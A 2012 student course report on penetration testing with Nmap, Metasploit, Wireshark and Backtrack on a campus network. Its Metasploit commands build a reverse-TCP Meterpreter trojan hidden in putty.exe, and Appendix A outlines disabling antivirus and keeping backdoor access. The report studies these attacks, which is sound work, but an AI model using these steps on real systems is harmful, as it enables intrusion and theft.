Upload
lythien
View
222
Download
4
Embed Size (px)
Citation preview
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 1 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Security Assessment and Analysis with
Penetration Tools and Wireshark
(Final Draft)
Ryan A. Drozdowski, Mike Hannaford, James Royal
Instructor: Dr. Janusz Zalewski
CNT 4104 Fall 2012 – Networks
Florida Gulf Coast University
Fort Myers, Florida
12-11-2012
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 2 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
1. Introduction
Network security is very important whether it is personal or business making sure that the
information on these networks isn’t accessible by unauthorized users. One must make sure that
the information on a network isn’t easily accessed without proper permission. Penetration tools
are perfect for someone to test security of a network because they are very similar to what
hackers really use or do depending on the software. [7] A heavily supported operating system
that supports many penetration tools is Backtrack. Although the project is using only a few
features of Backtrack there are many more available. A great starting tool is NMap which allows
someone to map out the confirmation of activities on the network and alert the user of possible
security issues. [1] Then there is Metasploit which is a tool used to perform attacks also known
as exploits on a certain part of the network.[2] Metasploit can be used to hack in to a network
and do detrimental things to a computer on a network. Wireshark is a great tool for monitoring
and analyzing data transfer [6]. As data travels over a wire or via a wireless network WireShark
picks up the packets traveling over the network and makes this available to the user via a
sophisticated graphical user interface.
This project is an extension of previous class projects using these three tools Metasploit,
NMap, WireShark with the addition of Backtrack 5 an operating system. The following section
provides brief introductions to all three tools: Metasploit, NMap, and WireShark and discusses
the problem addressed in this project and the methods of its solution.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 3 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
2. Previous Accomplishments
2.1 Metasploit
The pervious projects’ objective was to install Metasploit on a virtual machine to perform
penetration testing. With the virtual machines put in place the main goal was to find
vulnerabilities and deliver payloads to these virtual machines. Once the test has been completed
the next goal was to test it against the Computer Science lab network to see if there exist
vulnerabilities and if so exploit them.
The project started with downloading Metasploit and basic configuration. Metasploit
application was installed on a Windows platform running Windows 7 x64. With the installation
of Metasploit framework all the firewalls and anti-virus software had to be shutdown because of
the nature of penetration testing the computer you’re working on may think you are an intruder
and may prevent certain actions.
Oracle’s VirtualBox was installed as the virtual machine on the same machine as the
Metasploit is installed. Once the VirtualBox was installed a virtual machine was running a Linux
Ubuntu and Windows XP.
The last piece of software to have been installed on the machine was Armitage. Armitage is a
user interface for Metasploit. That makes it very nice and easy to navigate with Metasploit which
itself is a command line program natively. Armitage was downloaded and then set to work on the
Metasploit framework installed on this machine.
The start up of Armitage which automatically activates Metasploit and then the virtual
machine running the Linux OS are required. Once both applications are running the penetration
testing is started. Armitage is then used to scan the Computer Science lab network IP address
69.88.163.0/24 as shown in Figures 2.1.1-2.1.3 to display all machines running on the network.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 4 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 2.1.1- Quick Scan. [4]
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 5 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 2.1.2- Scan range. [4]
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 6 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 2.1.3 - After a scan of the network. [4]
With this all computers available to attack shown, the virtual machine is running on the local
host with IP address 192.168.56.102. The icon of the machine can then be right-clicked with a
drop down menu and scanned as shown in Figure 2.1.5. When the scan completes all ports
identified are shown on the virtual machine as illustrated in Figure 2.1.6. Then one can click
Attacks on the task bar. When this is done all the available attacks are then shown under the
Attacks menu. The exploit tomcat_mgr_deploy can then be selected and a window appears with
attack information where all the information is checked to select launch as shown in Figure 2.1.7.
This attack will launch a Meterpreter to communicate with attacked virtual machine. The
Armitage user interface will display the attacked machine with lightning bolts as shown in Figure
2.1.8.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 7 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 2.1.4 – Local machine and Measplotiable virtual machine. [4]
Figure 2.1.5 – Drop down menu options for this machine. Select Scan. [4]
Figure 2.1.6 - Services tab for Measplotiable machine. [4]
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 8 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 2.1.7 - Attack list showing available exploits. [4]
Figure 2.1.8 – Exploited Measplotiable machine.
A similar attack was attempted on the Florida Gulf Coast University Computer Science
Lab Network which proved to be unsuccessful. This leads to the conclusion that the network has
no known vulnerabilities at that time. [4] The main goal of this previous project was achieved
but not the secondary goal which is penetrating the Computer Science network.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 9 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
2.2 NMap
The pervious projects’ objective was to use of two different applications first,
NMap was to detect open ports with the hopes of finding vulnerabilities. The second
application was SNORT is an intrusion detection system. With these two applications the
goal was to use NMap to attack a computer on the network while concurrently running
SNORT to try and detect the attack done by NMap.
The previous project’s goal was to utilize both NMap and SNORT, so it started by
attempting to understand the software: both its capabilities and its limitations. With this, the
project was then given a test of both applications. This was to make sure both applications
anticipated.
SNORT was the first challenge and a custom SNORT detection rules using MYSQL
server were written. SNORT, which has a feature that allows a user to write custom detection
rules for a particular environment.
NMap was then mapped out how it would scan the network shown in Figure 2.2.1. NMap
is a command line application with a lot of options; most are available on every network or
environment.
Figure 2.2.1 NMap plan for attack. [5]
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 10 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
This all was to be performed within a virtual environment NMap running on Windows 7
and the SNORT running on Ubuntu Linux as shown in Figure 2.2.2. SNORT was then started
and the custom rules were imported to the system. Then the NMap application was started.
With SNORT running with its custom rules imported, detected and logged all of NMap’s
scans even with its flexibility and custom command line scans.
Figure 2.2.2 Map of the Network. [5]
The conclusion of this project was that both NMap and SNORT have very useful
functionality and flexibility. SNORT could be expanded to a greater set of rules to detect and
log far more data to prevent intrusion and allow for a more secure network.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 11 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
2.3Wireshark
The previous WireShark project’s primary goal was to setup the software on a
Windows based personal computer in the Computer Science lab along with a USB device
called AirPcap [3]. The project was more of an understanding the software and all its features
with little implementation of the software where useful data were collected and a conclusion
was drawn that one could tell what was going on over a wireless network effectively.
The WireShark is an open source program downloadable from the web at
wireshark.org. One must select which operating system is to be used then select download.
Along with downloading WireShark another pieces of software that must also be downloaded
and installed is WinPCap. If one follows the on screen prompt, it will ask if one wishes to
install it. So make sure it is selected as shown in Figure 2.3.1.
Figure 2.3.1 Prompt to download WinPCap. [1]
The next step is to insert the AirPcap USB device. Once inserted it will prompt to
download the driver. This must be done to use the software as shown in Figure 2.3.2. Once
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 12 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
all this software has been downloaded, one can launch WireShark and sniff packets over a
wireless network.
Figure 2.3.2 Prompt to download the AirPcap driver. [1]
With WireShark running, one must select the AirPcap as the interface. Then the
scan automatically starts as shown in Figures 2.3.3-2.3.4. Once running it was discovered
that one could filter the scan either by IP filters or protocol filters. This was used to limit the
scan to only “cups” which is packets using the Common Unix Printing System Protocol [1]
as shown in Figure 2.3.5. After some analyzing of the data, Apple computers were singled
out and the IP address and the type of printer, as shown in Figure 2.3.6, were displayed.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 13 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 2.3.3 Select AirPcap as the interface. [1]
Figure 2.3.4 Sniffing packets over the network. [1]
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 14 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 2.3.5 The filtered out packets. [1]
Figure 2.3.6 Displays the individual packets with their relevant data. [1]
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 15 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
3. Problem Description
Given the four tools described in the previous section, the plan was to attempt a hack in
to a computer or embedded system over the Computer Science lab wireless network. Each of the
three penetration tools will be used; NMap, Metasploit, and WireShark, will have its own role to
play, with addition of Backtrack [11].
Backtrack’s role is to be the intermediary, as it has: NMap and Metasploit built in to its
framework. This software has integrated both programs making it the top choice for the project
to execute a successful attack. Backtrack is installed onto the attacking computer giving us
access to the penetration tools.
NMap’s role is to detect and map out all the computers on the wireless network shown in
Figure 3.1. The NMap gives the potential ability to see IP addresses, open ports, closed ports and
the associated operating system of the machine on a given IP address. This constitutes the first
part of the project which is mapping out the network.
Figure 3.1 - Computer Science Wireless Network.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 16 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Metasploit is then used to create an exploit that will disguise an attacking program to
look like a normal program for example “putty.exe”. When this exploit is placed on a USB stick
and the user clicks on it and saves the file they will receive a “putty.exe” file with the exploit
embedded. Once the program “putty.exe” is launched on the users’ computer it will function like
“putty.exe” but the exploit will then notify the attacking computer that the file is up and running.
This allows some ports to open on that machine so that Metasploit can then penetrate without the
knowledge of the user and perform attacks against it.
WireShark can be used for monitoring the attack and watching the data packet exchange.
The monitoring can be started from the NMap to the exploit being installed, then the attack being
performed by Metasploit. With this knowledge the idea is to see if an attack can be done on
another device and if the attack could be prevented by seeing if certain packet transfers are
malicious attacks on the network shown in Figure 3.2.
Figure 3.2 – Map of the Attack over the Network - Computer 1 attacking Computer 2 while
Computer 5 monitors all packet transfer.
4. Preparation
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 17 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
4.1 NMap the CS Network
NMap is used to map out the Computer Science lab’s wireless network. The first
task is to analyze the network which is going to be attacked. NMap is perfect for this
task. The first command the project will require is nmap “–O 69.88.163.0/24” as shown
in Figure 4.1. This command allows one to see all systems on IP address range
69.88.163.0/24 and displays the operating systems. These data can be used to customize
an exploit to attack the specific computer. The one selected will be a Windows 7 pc with
the IP address 69.88.163.240.
Figure 4.1 Command to display operating systems on the IP range 69.88.163.0/24.
4.2 Running and Setting Up WireShark
WireShark is set up to monitor the Computer Science network effectively and
efficiently. The AirPcap drivers need to be installed for this purpose. After installation
has completed, the AirPcap has to be inserted in the USB port and the wireless
networking card will be turned off. After all this has been completed, WireShark is ready
to start, using the AirPcap as the selected sniffing interface. After several minutes
WireShark will capture about 30,000 data packets over all the wireless networks in the
area. There must be a software filter to narrow down the number of recorded packets.
Using filter ”ip.src == 69.88.163.240 || ip.dst == 69.88.163.240” as shown in Figure 4.2,
sorts through the data and finds only data packets sent and received from the computer
with IP Address 69.88.163.240, which is a computer running in the Computer Science
lab. This filtering command is then saved into WireShark’s filtering system. This allows
future the monitoring of the planned attacks on a computer on the Computer Science
Wireless Network. This can also be done for the attacking computer.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 18 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 4.2 Filtering out ip address 69.88.163.240 as the source and destination.
4.3 Backtrack Setup
Backtrack is the operating system used in this project to facilitate the attacks. It is
saved on a USB stick to be used on any computer. To launch the operating system one
must first go into the BIOS of the computer and change the system boot order so that the
USB is the first in the order. Once that has been completed, then during the boot screen
will then confirm if one wants to boot from USB. Once the operating system is booted on
the computer there is another boot screen from the Backtrack. The option that must be
selected is Backtrack is persistent text mode boot. Then a command prompt appears to
start the desktop with “startx”. Once it is finished loading, the Backtrack operating
system is ready to use as shown in Figure 4.3.
Figure 4.3 Backtrack desktop screen.
4.4 Customizing an Exploit using Metasploit
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 19 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Metasploit is a built in application within the Backtrack operating system. To start
Metasploit one must start up the Konsole window. Once the Konsole console window is
started, the command “msfconsole” must be entered. This will launch the Metasploit
console as shown in Figure 4.4. If at any time one needs help in the Metasploit window,
the command “help” can be entered.
Figure 4.4 Metasploit framework.
To create exploit one must first know what payload one wishes to use. For the
project we used NMap and found a Windows 7 PC so the selected payload was reverse
TCP. To create this exploit one must type “use
payload/windows/meterpreter/reverse_tcp” as shown in Figure 4.5. Once the payload is
loaded into Metasploit, type “show options” to see what is required for this payload as
shown in Figure 4.6. This will show that the LHOST and LPORT must be set. The
LHOST is the listening computers IP address and the LPORT is the port that the
computer will be listening on. To set the LHOST type “set LHOST = 69.88.163.15”. To
set the LPORT type “set LPORT = 5001”. Those are the attribute of our attacking
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 20 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
computer. With these properties set one can create the exploit. The exploit can be
attached to any executable so the chosen program was “putty.exe”.
To generate this infected program type “generate –k –t exe –x /tmp/putty.exe –f
/tmp/putty_pro.exe” as shown in Figure 4.7. The “–k –t exe” tells the exploit generator
that the program being generated will be of extension exe. The “-x /tmp/putty.exe” tells
the exploit generator the source file path. Then the “-f /tmp/putty_pro.exe” tells the
exploit generator the new executable’s name and file path. Once the file is created type
“back” to exit the payload menu and return to the main menu within Metasploit.
Figure 4.5 Loading the reverse TCP payload.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 21 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 4.6 Shows options for the payload.
Figure 4.7 Generates the infected executable.
Now that the exploit has been created it is time to launch the listener for that
exploit. Type “use exploit/multi/handler” as shown in Figure 4.8 this will bring you to the
screen, where one can listen for the exploit. Once again, one must set both the LHOST
and LPORT to the IP address and the port number that is selected for the payload as
shown in Figure 4.9. Once that has been completed, typing “exploit” wait launch the
program as shown in Figure 4.10.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 22 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 4.8 Launches the exploit handler.
Figure 4.9 Sets the listening host.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 23 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 4.10 Starts to listen for the exploit.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 24 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
5. Implementation
5.1 Methodology
5.1.1 Reverse TCP
The reverse TCP connection is usually used to bypass firewall restrictions
on open ports. The firewall usually blocks open ports, but does not block outgoing
traffic. In a normal forward connection, a client connects to a server through the
server's open port, but in the case of a reverse connection, the client opens the port
that the server connects to. The most common way a reverse connection is used is
to bypass firewall and Router security restrictions.
5.1.2 Trojan Horse
The Trojan Horse is an executable running on the computer behind a
firewall. This can open an outgoing connection to an external source. Once the
connection is made one can send commands to that computer
5.1.3 Man in the Middle
Another benefit to using Backtrack is the use of Ettercap. Ettercap is a
piece of software, which makes initiating a man in the middle attack easy. A man
in the middle attack is the process of routing all data packets on the specified
network through a given computer on the network before sending them out to the
Internet. This attack allows the computer initiating the attack to validate packets
and reroute them as needed.
A malicious example of this would be if some of the users of the network
used the network to do their online banking. The user generating the man in the
middle attack wants all usernames and passwords for the users on the network
attempting to access Bank of America's website. The user generating the man in
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 25 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
the middle attack would then sift through all the data packets on the network
rerouting the packets with the destination IP address of Bank of America's
website to a different desired destination IP which serves a clone of the Bank of
Americas website. The end user has no knowledge of the reroute and would
continue to enter their login credentials as usual. Once the user hits the submit
button, the attacker gains their private information.
5.1.4 Daemon
This project makes use of Metasploit in order to generate Payloads.
Metasploit comes with several Payloads for one to use, but also has the ability to
generate them if one needs to. This is where Daemons come in to play in this
project. Daemons are essentially background processes in operating systems.
They are scripts that run in the background. They are headless meaning they do
not contain a graphical user interface. It’s like a small program running in the
operating system that the end user does not see. Daemons can be configured to
start when the operating system boots, and shut down when the operating system
terminates.
This project creates a Payload that is disguised as the open source
putty.exe application that is used as SSH and FTP client. The Payload which is
the customized putty.exe application looks, feels, and executes exactly like the
putty.exe application downloaded from the Internet. The only difference is that
when one opens this generated Payload (putty.exe) file on the target system the
Payload sends a reverse TCP connection back to the attacking system, which
allows the attacking system access to the target system. The issue with this is that
the attacking system only has access as long as our payload is running on the
target system. Once the user of the target system exits the Payload it closes the
reverse TCP connection.
Daemons make creating a back door into the target system a breeze. A
back door is the process of creating an entry point on the target system so that the
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 26 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
user of the attacking system can gain access to it any time they want. This would
remove the limitation of our Payload described in the previous paragraph. In
order to create a back door on the target system one would need to gain super user
privileges on the target system. This can be achieved with some of the other tools
Backtrack provides but is out of the scope of this project. This is to inform one on
the process of creating a back door. Once one has super user privileges on the
target system they would simple need to view the processes running on the target.
Our Payload is generated as a system process on the target system. One is
the true putty.exe application and the other is the reverse TCP connection back to
the attacking computer. With creating a daemon the reverse TCP connection is to
be activated when the targeted computer system starts and to stop it when the
system shuts down. One could gain access to the target system any time of the day
as long as it was turned on without the need for the Payload's execution.
5.1.5 Exploits and Payloads
Once the best vulnerability has been discovered in a network, a small and
specialized computer program, called an exploit, is used to take advantage of the
vulnerability and give the penetration tester access to the computer system. The
exploits are used to deliver the payloads to the target system. These payloads are
the way that the penetration tester gains access to the computer. Payloads are
introduced in the next paragraph.
There are approximately over 180 exploits in the Metasploit Framework.
Since the security community is encouraged to get involved in the continuing
development of exploits there is currently a public database of usable exploits.
The exploit database is constantly being updated by community support and when
new exploits are found they are posted. [4]
Payloads are pieces of code that get executed on the target system as part
of an exploit attempt. A payload is usually sequence of assembly instructions,
which helps achieve a specific post-exploitation objective, such as adding a new
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 27 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
user to the remote system, or launching a command prompt and binding it to a
local port.
Traditionally, payloads were created from scratch or modifying existing
pieces of assembly code. This requires an in-depth knowledge not only of
assembly programming, but also of the internal workings of the target operating
system. But a number of scripts now enable payloads to be developed without
needing to modify any assembly code at all. The different types of payloads allow
for different types of control the penetration tester has over the target system. The
most commonly used payload is called the Meterpreter. This payload allows the
penetration tester to turn on the target systems webcam, take control of the mouse,
keyboard and even take screenshots. All of these options are for the penetration
tester to see what exact holes there are in the system. Having access to key
functions on one computer may not necessarily mean control over the whole
network, but it is a start in determining which aspects of the network are the most
vulnerable. [4]
5.1.6 Backtrack 5
Backtrack Linux is a version of an open source Linux operating system
that is licensed under the GPL open source license. Backtrack is used by network
professionals in the industry and is considered the standard operating system for
digital forensics, and penetration testing. The operating system is named after the
well known backtracking algorithm and its current version is Backtrack 5 r3
which is the version that this project is using.
Backtrack comes with Metasploit and NMap completely installed in the
standard ISO image download, as well as with many other great tools for
penetration testing such as Aircrack-ng which enables the ability to crack WEP
and WPA wireless passwords, Snort which enables ability to sniff out packets on
a given network, Kismit which is an intrusion detection system, Ophcrack which
is a windows password cracker that uses LM Hashes through Rainbow tables.,
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 28 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
and Ettercap which is specifically designed for man in the middle attacks. These
are just a handful of great penetration applications that come with Backtrack.
All of these tools are integrated deep into the operating system which
allows for ease of use when it comes to testing a specified network. One can
install some of these tools on other operating systems but most of the tools listed
here are designed to work best with Backtrack. It is encouraged that if one must
take on the task of penetration testing of any network one should use Backtrack
Linux as the preferred operating system to do so. Backtrack makes the use of
these programs easy and straightforward without the need of customizing an
operating system of choice in such a way to use these programs.
The benefit of using Backtrack is that it is easily installed onto a USB
drive. Due to the fact that Backtrack is based on Linux the specified hardware
requirements are not as demanding as for a standard operating system. Backtrack
can run on 512 megabytes of RAM and only consumes about 1 Gigabyte of hard
drive space. Per this requirement one can easily install Backtrack onto a USB
drive and boot into the operating system from just about any computer on any
network. This operating system can allow someone with malicious intent to take
down an enterprise system and destroy or compromise valuable data like credit
card information, privacy information such as social security numbers, and now
with the advancements of GPS systems one could obtain location information if
they were searching for someone with the intent to do bodily harm.
5.2 Testing Experiments
For all the test cases the preparation described in previous sections has not
changed and the attacking computer is already in the listening stage as well as the
Wireshark computer is also already sniffing.
The assumption is that all the directions given in the previous sections have been
completed. For the experiment the use of three computers is needed. The first is the
computer with Backtrack running the exploit with IP address 69.88.163.15. The next is
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 29 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
the computer being attacked wirelessly with IP address 69.88.163.240. Last the third
computer has to run Wireshark to sniff the wireless packets. These three computers are
referred to by exploit computer, attacked computer and Wireshark computer. They are all
in their respective waiting stage as shown in Figures 5.1-5.3. The exploit computer is
listening at IP 69.88.163.15 on port 5001. The attacked computer is about to click on the
putty_pro.exe application. Wireshark is scanning packets with the filter “ip.scr ==
69.88.163.240 || ip.dst == 69.88.163.240”.
Figure 5.1: Exploit computer listening on IP 69.88.163.15 and port 5001.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 30 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 5.2: Attacked computer, with application to be clicked.
Figure 5.3: Wireshark computer sniffing wireless packets with a filter in place.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 31 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
The first step to be done is make a connection. So the attacked computer will click
on the “putty_pro.exe” application. Once that has been done the exploit computer is
connected as shown in Figure 5.4. Then Wireshark will detect the connection as shown in
Figure 5.5.
Figure 5.4: Exploit computer makes the reverse TCP connection.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 32 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 5.5: Wireshark computer see the packets that make the connection.
Once the connection has been created one can call commands all of which can be
found in the Appendix or by typing “?” into the exploit computer. The first command that is used
by the exploit computer is “ps” as shown in Figure 5.6. The output shows all the processes
running on the attacked computer. The attacked computer has no knowledge of this command
being executed. Wireshark will detect the TCP transfer protocol packets transferred between the
exploit computer and the attacked computer as shown Figure 5.7.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 33 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 5.6: Exploit computer entering “ps” command showing all processes on the targeted
computer.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 34 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 5.7: Wireshark computer shows TCP packets that were captured the moment after the
command “ps”.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 35 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
With the processes being displayed in the exploit computer one can select an ID
to kill the process as shown in Figure 5.8. The process that is going to be killed is 5040
which is Internet Explorer on the attacked computer as shown in Figure 5.9. After typing
“kill 5040” on the Exploit computer as shown in Figure 5.10, Internet explorer on the
attacked computer will close as shown in Figure 5.11. Wireshark will capture the TCP
packets that are sent to execute the kill command as shown in Figure 5.12. This is the end
of the experiment.
Figure 5.8: Exploit computer selects the process to kill.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 36 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 5.9: Attacked computer has Internet Explorer window open.
Figure 5.10: Exploit computer killing process ID 5040 or Internet Explorer.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 37 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 5.11: Attacked computer showing that Internet Explorer was killed by the exploit
computer.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 38 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure 5.12: Wireshark computer captured the packets moments after the kill command is
executed.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 39 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
6. Conclusion
Security assessment and analysis are complex concepts and require complex tools such as
Backtrack, NMap, Metasploit, and Wireshark. NMap is a great tool for preliminary testing such
as finding a system to attack or just seeing what’s on the network. But it doesn’t allow much of
anything else but a starting point. Wireshark is a similar tool, since it monitors packets over a
network wired or wireless. It won’t directly tell anything but it might alert users to a possible
threat. Backtrack with the Metasploit frame work built in is the bulk of the penetration testing, as
it allows to test and see, for example if your antivirus is any, good among other things.
Separately none of these tools software would have been useful but together they allow for very
practical applications.
The Metasploit exploit yielded success in allowing full control over the attacked
computer. It also allowed the viewing of all running processes. Then one can use commands to
killed selected processes. With this there may be some other “hacks” performed, such as the one
described in Appendix A. This may lead someone to try other exploits. The limitation of
Metasploit is only the user’s knowledge of the network and the systems running on it.
Wireshark yielded some success but it didn’t tell much about the attack on the wireless
computer. What it did show was a lot of communication between the two computers as well as
the fact that none of the TCP packets were transmitted a 100% which shouldn’t be the case in a
normal environment. For Wireshark to work functionally one would have to have an in-depth
understanding of the network and its behaviors, otherwise one would never gather useful
information from all the packets.
Further advancement for this type of project would be to investigate the other exploits
and perhaps find a way to spread the exploit to multiple computers quickly. NMap and
Metasploit have more capabilities than those described in this project. Backtrack also supports
different penetration testing tool such as: AirCarck-ng which is used to crack WEP and WPA
passwords. Furthermore, other tools, such as Nessus, could be added to expand the project.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 40 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Appendix A: Steps for performing a hack on FGCU’s network
As an exercise in checking security violation and protection, an attempt was made to
check vulnerability of Florida Gulf Coast University’s enterprise network. The following actions
were preformed to prove the vulnerability.
Step one: Stopping the Antivirus on the targeted computer
This can be done by a couple of simple system calls from a C++ program. As
proven by Chris Ruskai writing a simple C++ program that suspends the antivirus
and disables it is possible. The code is not included in the report but submitted
separately to instructor.
Step two: Placing Infected Program on the targeted computer
Create an exploit, as described in the previous section, which runs automatically
for example the Java updater. This allows the attack to go completely unnoticed.
Another way is to use infected putty.exe, which automatically connects to another
computer. Then shut down the computer.
Step three: Waiting for the connection between the attacking computer and the targeted
computer.
Once the targeted computer is started the Trojan will be launched and the
listening attacking computer will then have complete access to the targeted
computer.
Notes: Although this procedure will allow complete access to the targeted computer and its
system one only has about a 30-45 minute time slot before the antivirus will be automatically
launched again over the network, because of the security procedure put in place over the
enterprise network. If one studies the protection system well enough, once it launches again it
can be killed from the Meterpreter before it removes the Trojan.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 41 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure A.1: Diagram of the Network
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 42 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Appendix B: Exploit Commands
This Appendix includes screens shots of specific commands, which are useful for
performing an attack.
Figure B.1 Core Commands
Figure B.2 File System Commands.
Figure B.3 Networking Commands.
Figure B.4 System Commands.
Figure B.5 User Interface Commands.
Figure B.6 Webcam Commands.
Figure B.7 Elevate Commands.
Figure B.8 Passwords Database Commands.
Figure B.9 Timestomp Commands.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 43 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure B.1 Core Commands.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 44 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure B.2 File System Commands.
Figure B.3 Networking Commands.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 45 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure B.4 System Commands.
Figure B.5 User Interface Commands.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 46 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure B.6 Webcam Commands.
Figure B.7 Elevate Commands.
Figure B.8 Passwords Database Commands.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 47 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
Figure B.9 Timestomp Commands.
Ryan A. Drozdowski Mike Hannaford James Royal Florida Gulf Coast University 48 | P a g e Fall 2012
Network Security Penetration Tools and Wireshark
7. References
[1] Marsh, N. “NMap cookbook”, CreateSpace Independent Publishing Platform, Lexington, KY
August, 20118
[2] Kennedy, D., O’Gorman, J., Kearns, D., and Aharoni, M. “Metasploit the Penetration
Tester’s Guide”, no starch press, San Francisco, 2011
[3] Gehring, J. “WireShark”, FGCU, 2011, URL:
http://itech.fgcu.edu/faculty/zalewski/projects/files/WiresharkReport2011.pdf
[4] Steiner, C. “Metasploit”, FGCU, 2011, URL:
http://itech.fgcu.edu/faculty/zalewski/projects/files/MetasploitReport2011.pdf
[5] Carestia, E. “NMap and SNORT“, FGCU, 2011, URL:
http://itech.fgcu.edu/faculty/zalewski/projects/files/Nmap_and_SNORT_2011.pdf
[6] Wireshark, October, 2012 URL: http://www.wireshark.org/
[7] Agle, M. “A Penetration Tester’s Toolkit”, Linux Journal, vol.2012, no. 213, pp. 78 – 90,
January, 2012 URL: linuxjournal.com
[8] Mudge, R. “Live-fire security testing with Armitage and Metasploit”, vol. 2011, no. 205, pp.
44-49 May, 2011URL: linuxjournal.com
[9] NMap User Documentation, 2012 URL: http://nmap.org/book/man.html
[10] WireShark Display Filters, October, 2012, URL: http://wiki.wireshark.org/DisplayFilters
[11] Backtrack 5, 2012 URL: http://www.backtrack-linix.org/downloads